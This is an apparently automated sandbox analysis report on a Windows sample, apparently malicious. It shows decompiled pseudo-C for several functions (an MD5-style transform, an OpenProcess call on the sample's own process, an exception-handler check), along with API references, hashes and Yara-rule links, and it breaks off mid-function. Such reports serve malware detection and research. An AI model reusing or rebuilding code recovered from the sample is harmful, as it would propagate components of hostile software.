Opcode ID: d494e07e55b1b19bad3a947be892238ad666c5594d09709c477cf92254e46072
Instruction ID: 62cbedcc469f0435b7f53b2f0193481c76389cb3f7dbd27df4b5293bc8dacbd3
Opcode Fuzzy Hash: d494e07e55b1b19bad3a947be892238ad666c5594d09709c477cf92254e46072
Instruction Fuzzy Hash: B6F0C975D01218EBDB00DBA4C58CAFDB7B8EF05645F1084AAE602B3141D7B45B85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02F61BC1, Relevance: 1.3, APIs: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(02F6553C,?,?,02F6A818,3D02F6C0,80000002,02F6553C,02F69642,74666F53,4D4C4B48,02F69642,?,3D02F6C0,80000002,02F6553C,?), ref: 02F61BE1

Part of subcall function 02F66C68: SysAllocString.OLEAUT32(02F69642), ref: 02F66C81
Part of subcall function 02F66C68: SysFreeString.OLEAUT32(00000000), ref: 02F66CC2

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 2e1f583a16ab5bb1f5dcc2d6baeefb6a6707196244b139c843530607435914bd
Instruction ID: a7f40051531401cd156cf8b8fb348109386c510db31316e1aca00cd171b45cf9
Opcode Fuzzy Hash: 2e1f583a16ab5bb1f5dcc2d6baeefb6a6707196244b139c843530607435914bd
Instruction Fuzzy Hash: 99E0C23200424EBFCF129F80DC4AEAA3F6AFF08394F148015FA1859120D77295B0EFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F660CF, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F660CF(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E02F67A28(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E02F6147E(_a4);
				}
				return _t13;
			}

0x02f660db
0x02f660e0
0x02f660e4
0x02f660eb
0x02f660f6
0x02f660fa
0x02f660fa
0x02f66103

APIs

Part of subcall function 02F67A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 02F67A5E
Part of subcall function 02F67A28: memset.NTDLL ref: 02F67AD3
Part of subcall function 02F67A28: memset.NTDLL ref: 02F67AE7

memcpy.NTDLL(?,?,00000000,?,?,?,?,?,02F69F9F,?,?,02F69C62,00000002,?,?,?), ref: 02F660EB

Part of subcall function 02F6147E: RtlFreeHeap.NTDLL(00000000,00000000,02F61D11,00000000,?,?,-00000008), ref: 02F6148A

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
Instruction ID: c36d4ebe40bbc72a757975c2b141e7882ad221968982e4378c85303dbe9b7096
Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
Instruction Fuzzy Hash: A4E08C72500129B7CB223A94DC44EFFBF5DDF52AD1F044024FF089A215DA36CA10ABE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0151179C, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0151179C() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x1514130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x151413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x151412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x1514128 = _t5;
						 *0x1514130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x1514124 = _t6;
						if(_t6 == 0) {
							 *0x1514124 =  *0x1514124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x0151179d
0x015117ab
0x015117b1
0x015117b8
0x0151180f
0x0151180f
0x015117ba
0x015117c2
0x015117cf
0x015117cf
0x0151180b
0x0151180d
0x00000000
0x00000000
0x00000000
0x015117c4
0x015117cb
0x015117d1
0x015117d1
0x015117d6
0x015117e4
0x015117e9
0x015117ef
0x015117f5
0x015117fc
0x015117fe
0x015117fe
0x01511808
0x015117cd
0x015117cd
0x00000000
0x015117cd
0x015117cb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,015111E0), ref: 015117AB
GetVersion.KERNEL32(?,015111E0), ref: 015117BA
GetCurrentProcessId.KERNEL32(?,015111E0), ref: 015117D6
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,015111E0), ref: 015117EF

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 22fb85203b7c24443fdecd36ea8da7f5bc324600c2de103fcf64f050fdf630c2
Instruction ID: 39c84b92779f53ba09d6028ed5e48bfac29e6f8415fd90d4b85bf9396bbbf5e3
Opcode Fuzzy Hash: 22fb85203b7c24443fdecd36ea8da7f5bc324600c2de103fcf64f050fdf630c2
Instruction Fuzzy Hash: B3F08171AC0611ABEB739B7DB855B583BE0B705722F224166EA61CE1CCE3708449EB18

Uniqueness

Uniqueness Score: -1.00%

Function 100014EE, Relevance: 2.9, Strings: 2, Instructions: 376
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E100014EE(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __fp0) {
				signed char _t107;
				void* _t207;
				void* _t208;
				void* _t224;
				void* _t229;
				void* _t258;
				void* _t304;

				L0:
				while(1) {
					_t304 = __fp0;
					_t229 = __edi;
					_t224 = __edx;
					_t208 = __ebx;
					_t107 = __eax ^ 0x00000001;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					 *__ecx =  *__ecx + _t107;
					do {
						L4:
						 *__ecx =  *__ecx + _t207;
						 *__ecx =  *__ecx + _t207;
						 *__ecx =  *__ecx + _t207;
						 *__ecx =  *__ecx + _t207;
						 *__ecx =  *__ecx + _t207;
						 *__ecx =  *__ecx + _t207;
						 *__ecx =  *__ecx + _t207;
						 *__ecx =  *__ecx + _t207;
						 *__ecx =  *__ecx + _t207;
						_t207 = _t207 + 1;
						_t258 = _t207;
					} while (_t258 != 0);
					L6:
					if (_t258 == 0) goto L1;
					L7:
					asm("lodsd");
				}
			}

0x100014ee
0x100014ee
0x100014ee
0x100014ee
0x100014ee
0x100014ee
0x100014ee
0x100014f0
0x100014f2
0x100014f4
0x100014f6
0x100014f8
0x100014fa
0x100014fc
0x100014fe
0x10001500
0x10001502
0x10001504
0x10001506
0x10001508
0x1000150a
0x1000150b
0x1000150b
0x1000150b
0x1000150d
0x1000150f
0x10001511
0x10001513
0x10001515
0x10001517
0x10001519
0x1000151b
0x1000151d
0x1000151d
0x1000151d
0x10001521
0x10001521
0x10001522
0x10001522
0x10001522

Strings

c4, xrefs: 10001652
^, xrefs: 100017B2

Memory Dump Source

Source File: 00000000.00000002.460026556.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.460008405.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.460052961.0000000010033000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.460064901.000000001003A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ^$c4
API String ID: 0-1521911136
Opcode ID: d36a99e82302059e373f6ac51392788915569c633a76779ff0f90e3059f69455
Instruction ID: fde9079baa47f0e656a24f0c10ad0820295c5d9a6861e421d1c49df9953eaabd
Opcode Fuzzy Hash: d36a99e82302059e373f6ac51392788915569c633a76779ff0f90e3059f69455
Instruction Fuzzy Hash: 915121E006DB46BEFFD1A6344C570C37BE5E9433557A63989C8938A82B801C5923F7A7

Uniqueness

Uniqueness Score: -1.00%

Function 1000155A, Relevance: 2.8, Strings: 2, Instructions: 308COMMON

Download Yara Rule

Strings

c4, xrefs: 10001652
^, xrefs: 100017B2

Memory Dump Source

Source File: 00000000.00000002.460026556.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.460008405.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.460052961.0000000010033000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.460064901.000000001003A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ^$c4
API String ID: 0-1521911136
Opcode ID: 881e5c3d4a1df0d4728a1edfaa05228ff2f695205e84b5bb8ec959b5a70f58cc
Instruction ID: 1bac91f4e7f1869d1b30629c714b1e141fe6ac681797ba777c34451da279c647
Opcode Fuzzy Hash: 881e5c3d4a1df0d4728a1edfaa05228ff2f695205e84b5bb8ec959b5a70f58cc
Instruction Fuzzy Hash: 385104E0069B457EFF81A6344C570C37BE5E9433457A63999C4934A82B811C6E23F7A7

Uniqueness

Uniqueness Score: -1.00%

Function 02F65920, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E02F65920(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x02f65923
0x02f6592e
0x02f65931
0x02f65934
0x02f65935
0x02f65953
0x02f65955
0x02f65958
0x02f6595b
0x02f6595b
0x02f6595e
0x02f6595e
0x02f65961
0x02f65961
0x02f65964
0x02f65964
0x02f65981
0x02f65984
0x02f6599a
0x02f6599d
0x02f659b7
0x02f659ba
0x02f659d0
0x02f659d3
0x02f659d5
0x02f659ed
0x02f659f0
0x02f659f3
0x02f65a0b
0x02f65a0e
0x02f65a28
0x02f65a2b
0x02f65a41
0x02f65a44
0x02f65a46
0x02f65a5e
0x02f65a63
0x02f65a66
0x02f65a7c
0x02f65a7f
0x02f65a99
0x02f65a9c
0x02f65ab2
0x02f65ab5
0x02f65ab7
0x02f65ad2
0x02f65ad5
0x02f65aec
0x02f65aef
0x02f65af3
0x02f65b0c
0x02f65b0f
0x02f65b11
0x02f65b14
0x02f65b2f
0x02f65b32
0x02f65b4b
0x02f65b4e
0x02f65b5e
0x02f65b61
0x02f65b79
0x02f65b7c
0x02f65b96
0x02f65b99
0x02f65bb1
0x02f65bb4
0x02f65bca
0x02f65bcd
0x02f65be5
0x02f65be8
0x02f65c00
0x02f65c03
0x02f65c1d
0x02f65c20
0x02f65c36
0x02f65c39
0x02f65c51
0x02f65c54
0x02f65c6e
0x02f65c71
0x02f65c89
0x02f65c8c
0x02f65ca2
0x02f65ca5
0x02f65cbd
0x02f65cc0
0x02f65cd8
0x02f65cdb
0x02f65ced
0x02f65cf0
0x02f65d02
0x02f65d05
0x02f65d17
0x02f65d1a
0x02f65d1e
0x02f65d2e
0x02f65d31
0x02f65d3f
0x02f65d42
0x02f65d54
0x02f65d57
0x02f65d6b
0x02f65d6e
0x02f65d70
0x02f65d80
0x02f65d83
0x02f65d95
0x02f65d98
0x02f65da6
0x02f65da9
0x02f65dbb
0x02f65dbe
0x02f65dc2
0x02f65dd2
0x02f65dd5
0x02f65de7
0x02f65dea
0x02f65df8
0x02f65dfb
0x02f65e0d
0x02f65e10
0x02f65e22
0x02f65e25
0x02f65e39
0x02f65e3c
0x02f65e50
0x02f65e53
0x02f65e67
0x02f65e6a
0x02f65e7e
0x02f65e81
0x02f65e95
0x02f65e98
0x02f65eac
0x02f65eb1
0x02f65ec3
0x02f65ec6
0x02f65eda
0x02f65edd
0x02f65ef1
0x02f65ef4
0x02f65f0a
0x02f65f0d
0x02f65f21
0x02f65f24
0x02f65f36
0x02f65f39
0x02f65f4d
0x02f65f50
0x02f65f64
0x02f65f67
0x02f65f7b
0x02f65f84
0x02f65f87
0x02f65f90
0x02f65f99
0x02f65fa1
0x02f65fa9
0x02f65fb3
0x02f65fc8

APIs

memset.NTDLL ref: 02F65FBC

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 4017203efa24db58f9d54351c93f765915507c990ab3cf859a8473f221a58c33
Instruction ID: f6d3631ee4bc3534b5dad9794fad60a18d1cd5315be93e18492688421fb92fc8
Opcode Fuzzy Hash: 4017203efa24db58f9d54351c93f765915507c990ab3cf859a8473f221a58c33
Instruction Fuzzy Hash: BF22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 015123F5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E015123F5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x1514178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x15141c0 = 1;
										__eflags =  *0x15141c0;
										if( *0x15141c0 != 0) {
											goto L60;
										}
										_t84 =  *0x1514178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x15141c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x1514178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x1514180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
